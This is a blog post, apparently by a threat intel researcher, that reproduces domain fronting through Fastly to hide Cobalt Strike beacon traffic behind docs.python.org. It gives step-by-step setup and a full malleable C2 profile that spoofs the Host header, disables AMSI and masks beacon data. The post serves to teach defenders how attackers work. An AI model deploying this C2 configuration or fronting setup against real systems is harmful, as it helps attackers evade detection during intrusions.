<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Threat Spotlight - Domain Fronting - Just Still</title>
<meta name="description" content="Fast(ly) but deadly.">


  <meta name="author" content="Still Hsu">
  
  <meta property="article:author" content="Still Hsu">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Just Still">
<meta property="og:title" content="Threat Spotlight - Domain Fronting">
<meta property="og:url" content="https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/">


  <meta property="og:description" content="Fast(ly) but deadly.">



  <meta property="og:image" content="https://stillu.cc/assets/images/posts/domain-fronting/2021-11-13_19-28-47.png">



  <meta name="twitter:site" content="@StillAzureH">
  <meta name="twitter:title" content="Threat Spotlight - Domain Fronting">
  <meta name="twitter:description" content="Fast(ly) but deadly.">
  <meta name="twitter:url" content="https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/">

  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content="https://stillu.cc/assets/images/posts/domain-fronting/2021-11-13_19-28-47.png">
  

  



  <meta property="article:published_time" content="2021-11-13T00:00:00+08:00">





  

  


<link rel="canonical" href="https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Still Hsu",
      "url": "https://stillu.cc/"
    
  }
</script>







<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Just Still Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->

<link rel="apple-touch-icon" sizes="57x57" href="/assets/icons/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/assets/icons/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/assets/icons/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/assets/icons/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/assets/icons/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/assets/icons/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/assets/icons/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/assets/icons/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/icons/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192"  href="/assets/icons/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/icons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/assets/icons/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/icons/favicon-16x16.png">
<link rel="manifest" href="/assets/icons/manifest.json">
<meta name="msapplication-TileColor" content="#F21368">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#F21368">
  </head>

  <body class="layout--single wide">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    <!--[if lt IE 9]>
<div class="notice--danger align-center" style="margin: 0;">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience.</div>
<![endif]-->

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
          <a class="site-logo" href="/"><img src="/assets/images/avatar-512.png" alt="Just Still"></a>
        
        <a class="site-title" href="/">
          Just Still
          
        </a>
        <ul class="visible-links"><li class="masthead__menu-item">
              <a href="/about">About</a>
            </li><li class="masthead__menu-item">
              <a href="/categories">Posts</a>
            </li></ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      
  







<div class="page__hero--overlay"
  style="background-color: #000; background-image: linear-gradient(rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0.75)), url('/assets/images/posts/domain-fronting/2021-11-13_19-28-47.png');"
>
  
    <div class="wrapper">
      <h1 id="page-title" class="page__title" itemprop="headline">
        
          Threat Spotlight - Domain Fronting

        
      </h1>
      
        <p class="page__lead">Fast(ly) but deadly.
</p>
      
      

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-11-13T00:00:00+08:00">November 13, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    
  </p>


      
      
    </div>
  
  
</div>




  
    



<nav class="breadcrumbs">
  <ol itemscope itemtype="https://schema.org/BreadcrumbList">
    
    
    
      
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="https://stillu.cc/" itemprop="item"><span itemprop="name">Home</span></a>
          <meta itemprop="position" content="1" />
        </li>
        <span class="sep">/</span>
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/categories/#threat-spotlight" itemprop="item"><span itemprop="name">Threat spotlight</span></a>
          <meta itemprop="position" content="2" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/categories/#2021" itemprop="item"><span itemprop="name">2021</span></a>
          <meta itemprop="position" content="3" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/categories/#11" itemprop="item"><span itemprop="name">11</span></a>
          <meta itemprop="position" content="4" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/categories/#13" itemprop="item"><span itemprop="name">13</span></a>
          <meta itemprop="position" content="5" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        <li class="current">Threat Spotlight - Domain Fronting</li>
      
    
  </ol>
</nav>

  


<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person">

  
    <div class="author__avatar">
      
        <img src="/assets/images/avatar-512.png" alt="Still Hsu" itemprop="image">
      
    </div>
  

  <div class="author__content">
    
      <h3 class="author__name" itemprop="name">Still Hsu</h3>
    
    
      <div class="author__bio" itemprop="description">
        <p>Developer, photographer, infosec researcher.</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name">Taiwan</span>
        </li>
      

      
        
          
            <li><a href="https://twitter.com/StillAzureH" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/Still34" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
          
            <li><a href="/.well-known/pubkey.asc" rel="nofollow noopener noreferrer"><i class="fas fa-user-lock" aria-hidden="true"></i><span class="label">GPG (Email)</span></a></li>
          
        
      

      

      
        <li>
          <a href="mailto:business@stillu.cc">
            <meta itemprop="email" content="business@stillu.cc" />
            <i class="fas fa-fw fa-envelope-square" aria-hidden="true"></i><span class="label">Email</span>
          </a>
        </li>
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Threat Spotlight - Domain Fronting">
    <meta itemprop="description" content="Fast(ly) but deadly.">
    <meta itemprop="datePublished" content="2021-11-13T00:00:00+08:00">
    

    <div class="page__inner-wrap">
      

      <section class="page__content" itemprop="text">
        
        <p>Domain fronting is a common technique that is sometimes used by threat actors to disguise their traffic as the real deal. Essentially, what it is is communicate with legitimate-looking domains when reality, the traffic is being pointed to threat actor’s C2 stations. A common example would be using legitimate or reputable domains with a custom <code class="language-plaintext highlighter-rouge">Host</code> header to redirect the traffic to threat actor’s stations. There are many examples out there that abuse services like <a href="https://digi.ninja/blog/cloudflare_example.php">Cloudflare</a>, <a href="https://digi.ninja/blog/cloudfront_example.php">CloudFront</a>, and such.</p>

<p>In today’s example, we’ll be using Fastly as an example. Fastly provides a service that’s more or less intended to act as a CDN, where you can create a service and tie it to your backend. As you can imagine, a company as large as Fastly (<a href="https://www.bloomberg.com/news/articles/2021-06-08/explaining-cdns-and-why-big-websites-crash-together-quicktake">that was able to bring half the Internet with it when it went down</a>), there are probably more than thousands of people using their services - and indeed there are.</p>

<p>You can do a quick search using services like RiskIQ to look through all of the subdomains associated with <code class="language-plaintext highlighter-rouge">*.fastly.net</code>. While <a href="https://fortynorthsecurity.com/blog/fastly-and-fronting/">it appears we’re not the first to discover this</a>, there aren’t a whole lot of other resources out there talking about abusing Fastly as a service.</p>

<p><a href="/assets/images/posts/domain-fronting/2021-11-14_20-34-02.png"><img class="lazy align-center" src="/generated/assets/images/posts/domain-fronting/2021-11-14_20-34-02-440-fe2031482.png" srcset="/generated/assets/images/posts/domain-fronting/2021-11-14_20-34-02-440-fe2031482.png 0.73x"></a></p>

<p>And Python Software Foundation just so happens to use it too!</p>

<p><a href="/assets/images/posts/domain-fronting/2021-11-14_20-40-10.png"><img class="lazy align-center" src="/generated/assets/images/posts/domain-fronting/2021-11-14_20-40-10-600-dff4775ea.png" srcset="/generated/assets/images/posts/domain-fronting/2021-11-14_20-40-10-600-dff4775ea.png 1.0x, /generated/assets/images/posts/domain-fronting/2021-11-14_20-40-10-886-dff4775ea.png 1.48x"></a></p>

<p>What actually happens is when you contact <code class="language-plaintext highlighter-rouge">python.org</code>, it actually gets interpreted as <code class="language-plaintext highlighter-rouge">python.org.prod.global.fastly.net</code> internally based on the <code class="language-plaintext highlighter-rouge">Host</code> header. This was actually brought to our attention a while back when my colleagues discovered there were CobaltStrike beacons in the wild that appear to connect to Python-related domains at execution, and upon further investigation, we realized they were abusing the nature of Fastly services to disguise their traffic. So I decided to do a little experiment this weekend to see if I can recreate that myself.</p>

<p>To get started, I created a new service on Fastly called <code class="language-plaintext highlighter-rouge">dl-python.org</code>, a service name (and in turn, a domain name) that appears to be similar enough to the real deal, but doesn’t actually exist (and it doesn’t need to be!).</p>

<figure>
  <a href="/assets/images/posts/domain-fronting/2021-11-13_19-29-20.png">
  <picture>
    <source srcset="/generated/assets/images/posts/domain-fronting/2021-11-13_19-29-20-400-872480f2d.webp 400w, /generated/assets/images/posts/domain-fronting/2021-11-13_19-29-20-600-872480f2d.webp 600w, /generated/assets/images/posts/domain-fronting/2021-11-13_19-29-20-800-872480f2d.webp 800w, /generated/assets/images/posts/domain-fronting/2021-11-13_19-29-20-1000-872480f2d.webp 1000w" type="image/webp" />
    <source srcset="/generated/assets/images/posts/domain-fronting/2021-11-13_19-29-20-400-8ea4bc972.png 400w, /generated/assets/images/posts/domain-fronting/2021-11-13_19-29-20-600-8ea4bc972.png 600w, /generated/assets/images/posts/domain-fronting/2021-11-13_19-29-20-800-8ea4bc972.png 800w, /generated/assets/images/posts/domain-fronting/2021-11-13_19-29-20-1000-8ea4bc972.png 1000w" type="image/png" />
    <img class="lazy" src="/generated/assets/images/posts/domain-fronting/2021-11-13_19-29-20-800-8ea4bc972.png" width="1315" height="363" />
  </picture>
</a>

  <a href="/assets/images/posts/domain-fronting/2021-11-14_20-47-44.png">
  <picture>
    <source srcset="/generated/assets/images/posts/domain-fronting/2021-11-14_20-47-44-400-c909c8b50.webp 400w, /generated/assets/images/posts/domain-fronting/2021-11-14_20-47-44-600-c909c8b50.webp 600w, /generated/assets/images/posts/domain-fronting/2021-11-14_20-47-44-800-c909c8b50.webp 800w, /generated/assets/images/posts/domain-fronting/2021-11-14_20-47-44-1000-c909c8b50.webp 1000w" type="image/webp" />
    <source srcset="/generated/assets/images/posts/domain-fronting/2021-11-14_20-47-44-400-04fc3fe5e.png 400w, /generated/assets/images/posts/domain-fronting/2021-11-14_20-47-44-600-04fc3fe5e.png 600w, /generated/assets/images/posts/domain-fronting/2021-11-14_20-47-44-800-04fc3fe5e.png 800w, /generated/assets/images/posts/domain-fronting/2021-11-14_20-47-44-1000-04fc3fe5e.png 1000w" type="image/png" />
    <img class="lazy" src="/generated/assets/images/posts/domain-fronting/2021-11-14_20-47-44-800-04fc3fe5e.png" width="1024" height="287" />
  </picture>
</a>

  <figcaption>
    Create a new service that appears to be genuine enough to the target domain name. In this case, <code>dl-python.org</code>.
    Note that while <code>dl-python.org</code> appears to be actually owned by someone else, I don't actually have access to it, nor will it actually make contact with the domain (we'll get to that part later). You can name it whatever you want.
  </figcaption>
</figure>

<p>Next, in the Host settings section, enter your actual C2’s domain name, something you have actual control over. In this case, <code class="language-plaintext highlighter-rouge">my-c2domain.com</code>. I have the port set to <code class="language-plaintext highlighter-rouge">55137</code>, but it should be 443 ideally for HTTPS beacons. My 80/443 port was occupied by something else when I was experimenting with it.</p>

<p><a href="/assets/images/posts/domain-fronting/2021-11-13_19-29-57.png"><img class="lazy align-center" src="/generated/assets/images/posts/domain-fronting/2021-11-13_19-29-57-600-45b5c111d.png" srcset="/generated/assets/images/posts/domain-fronting/2021-11-13_19-29-57-600-45b5c111d.png 1.0x, /generated/assets/images/posts/domain-fronting/2021-11-13_19-29-57-900.0-45b5c111d.png 1.5x, /generated/assets/images/posts/domain-fronting/2021-11-13_19-29-57-1200-45b5c111d.png 2.0x"></a></p>

<p>Next, we’re going to craft a new CobaltStrike Stager. Create a new Listener on your team server with the vulnerable domain name as the C2, and enter your service name in the <code class="language-plaintext highlighter-rouge">Host</code> field. To make the traffic look a little bit more genuine, you can also craft your own malleable C2 profile that has contents of Python docs inside.</p>

<p><a href="/assets/images/posts/domain-fronting/2021-11-13_19-28-47.png"><img class="lazy align-center" src="/generated/assets/images/posts/domain-fronting/2021-11-13_19-28-47-600-f3db9a015.png" srcset="/generated/assets/images/posts/domain-fronting/2021-11-13_19-28-47-600-f3db9a015.png 1.0x, /generated/assets/images/posts/domain-fronting/2021-11-13_19-28-47-900.0-f3db9a015.png 1.5x, /generated/assets/images/posts/domain-fronting/2021-11-13_19-28-47-1200-f3db9a015.png 2.0x"></a></p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set sleeptime "5000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (Windows NT 6.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0";

# set host_stage "false";
post-ex {
	# control the temporary process we spawn to
	set spawnto_x86 "%ProgramFiles(x86)%\\Everything\\Everything.exe";
	set spawnto_x64 "%ProgramFiles%\\Mozilla Firefox\\firefox.exe";

	# change the permissions and content of our post-ex DLLs
	set obfuscate "true";

	# pass key function pointers from Beacon to its child jobs
	set smartinject "true";

	# disable AMSI in powerpick, execute-assembly, and psinject
	set amsi_disable "true";
}

http-config {
	set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
	set trust_x_forwarded_for "false";
	header "Server" "nginx";
	header "Keep-Alive" "timeout=5, max=100";
	header "Connection" "Keep-Alive";
}

http-get {
    set uri "/3/library/stdtypes.html";
    client {
        header "Accept" "*/*";
        header "Host" "dl-python.org";
        metadata {
            base64;
            prepend "session=";
            header "Cookie";
        }
    }

    server {
        header "Server" "nginx";
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "application/javascript; charset=utf-8";

        output {
            base64url;
            # the content was so long for my IDE that it actually hung when trying to parse it
            # so I'm gonna leave this section to you
            append "...html_head...";
            prepend "...html_body...";
            print;
        }
    }
}

http-post {
    set uri "/3/library/struct.html";
    client {
        header "Accept" "*/*";
        header "Host" "cobaltstrike.stillu.cc";
        id {
            mask;
            base64url;
            parameter "x-timer";
        }
        output {
            mask;
            base64url;
            parameter "etag";
        }
    }

    server {
        header "Server" "nginx";
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "application/javascript; charset=utf-8";

        output {
            base64url;
            append "...html_head...";
            prepend "...html_body...";
            print;
        }
    }
}
</code></pre></div></div>

<p>And that’s it! Let’s try to run the stager on our victim machine.</p>

<p><a href="/assets/images/posts/domain-fronting/2021-11-13_19-31-10.png"><img class="lazy align-center" src="/generated/assets/images/posts/domain-fronting/2021-11-13_19-31-10-600-eaa1402d8.png" srcset="/generated/assets/images/posts/domain-fronting/2021-11-13_19-31-10-600-eaa1402d8.png 1.0x, /generated/assets/images/posts/domain-fronting/2021-11-13_19-31-10-900.0-eaa1402d8.png 1.5x, /generated/assets/images/posts/domain-fronting/2021-11-13_19-31-10-1200-eaa1402d8.png 2.0x"></a></p>

<p>As you can see, it worked! It looks like it’s contacting <code class="language-plaintext highlighter-rouge">docs.python.org</code> (and it is), yet the server returned beacon information for the stager. Just not in plaintext because I had the <code class="language-plaintext highlighter-rouge">mask</code> option enabled, otherwise the content should look almost like standard HTML content with random bits of information thrown in there because of the malleable C2 config above - and this is with unencrypted traffic.</p>

<p>This trick is perfect for threat actors that want to evade IT admins’ attention as</p>
<ul>
  <li>it appears to contact a real domain with benign URL (<code class="language-plaintext highlighter-rouge">http://docs.python.org/3/library/stdtypes.html</code>)</li>
  <li>it can be made to communicate in HTTPS, so the <code class="language-plaintext highlighter-rouge">Host</code> header wouldn’t even show up</li>
  <li>if the IT admin does manage to figure out it goes to <code class="language-plaintext highlighter-rouge">dl-python.org.prod.global.fastly.net</code>, it doesn’t reveal the actual C2 address still, as the resolved IP would just be Fastly’s own CDN IP.</li>
</ul>

<p>This entire thing was really fun to recreate and helped me understand CobaltStrike a little bit more from attacker’s perspective, as I’ve always tackled CobaltStrike payloads from a Blue Team’s perspective as a threat intel researcher. If you are in the same position as me, I also encourage you to give CobaltStrike a try and try to attack your own machines to see what tricks you can pull off (if your organization has access to such tool).</p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/tags/#en-us" class="page__taxonomy-item" rel="tag">en-us</a><span class="sep">, </span>
    
      <a href="/tags/#guide" class="page__taxonomy-item" rel="tag">guide</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/categories/#threat-spotlight" class="page__taxonomy-item" rel="tag">threat-spotlight</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time datetime="2021-11-13T00:00:00+08:00">November 13, 2021</time></p>


      </footer>

      <section class="page__share">
  
    <h4 class="page__share-title">Share on</h4>
  

  <a href="https://twitter.com/intent/tweet?via=StillAzureH&text=Threat+Spotlight+-+Domain+Fronting%20https%3A%2F%2Fstillu.cc%2Fthreat-spotlight%2F2021%2F11%2F13%2Fdomain-fronting-fastly%2F" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fstillu.cc%2Fthreat-spotlight%2F2021%2F11%2F13%2Fdomain-fronting-fastly%2F" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fstillu.cc%2Fthreat-spotlight%2F2021%2F11%2F13%2Fdomain-fronting-fastly%2F" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>
</section>


      
  <nav class="pagination">
    
      <a href="/personal/2021/10/29/barinsta-and-facebook/" class="pagination--pager" title="Facebook, Monopoly, and Barinsta
">Previous</a>
    
    
      <a href="/ida-tips/2022/01/22/saved-desktops-across-32bit-64bit/" class="pagination--pager" title="IDA Trickeries #1: Using Saved Desktop Across IDAs
">Next</a>
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Leave a comment</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h4 class="page__related-title">You may also enjoy</h4>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/ida-tips/2022/01/22/saved-desktops-across-32bit-64bit/" rel="permalink">IDA Trickeries #1: Using Saved Desktop Across IDAs
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2022-01-22T00:00:00+08:00">January 22, 2022</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">So like… who at Hex-rays implemented this?
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/personal/2021/10/29/barinsta-and-facebook/" rel="permalink">Facebook, Monopoly, and Barinsta
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-29T00:00:00+08:00">October 29, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          8 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Facebook and its anti-competitive strategy.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/personal/2021/07/12/lockdown-taiwan-2021/" rel="permalink">Lockdown, Taiwan, 2021
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-07-12T00:00:00+08:00">July 12, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          2 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Impact of lockdown in Taiwan and my personal life.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/infosec/2021/03/01/obtaining-unreal-pak-decryption-key/" rel="permalink">How I Extracted an Unreal Engine Game’s WWise Audio
</a>
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-03-01T00:00:00+08:00">March 1, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          9 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">When you really want a game’s soundtrack, but the publisher hasn’t released them yet.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap"><form class="search-content__form" onkeydown="return event.key != 'Enter';">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term..." />
  </form>
  <div id="results" class="results"></div></div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    
      <li><strong>Follow:</strong></li>
    

    

    
      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
  </ul>
</div>

<div class="page__footer-copyright">&copy; 2022 Still Hsu. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-N6FGTZBMTZ"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-N6FGTZBMTZ', { 'anonymize_ip': false});
</script>






    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'Still34/landing');
    script.setAttribute('issue-term', 'pathname');
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  





  </body>
</html>
